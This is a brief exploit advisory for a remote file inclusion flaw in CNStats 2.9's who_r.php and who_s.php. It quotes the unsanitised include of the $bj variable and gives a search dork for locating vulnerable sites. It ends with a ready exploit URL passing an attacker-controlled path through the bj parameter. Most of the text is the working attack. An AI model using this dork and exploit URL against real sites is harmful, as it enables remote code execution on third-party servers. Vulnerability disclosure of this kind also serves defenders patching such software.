CNStats version 2.9 suffers from a remote file inclusion vulnerability.
775453ac2068eb33d33b8f608e445b3e8ca63f42782f1e853fe5678b1c9561b2
CNStats 2.9 (who_r.php) Remote File Include Vulnerability
-----------------------------------------------------------------------------------------
# Scripts : CNStats 2.9
# Discovered By : irvian
# scripts site : http://www.cnstats.com/
# dork : "CNStats 2.9"
------------------------------------------------------------------------------------------
bug found:
/reports/who_r.php
/reports/who_s.php
$bk = 't';
include $bj . 'reports/who.php';
Exploit: http://www.target.com/reports/who_r.php?bj=[evilcode]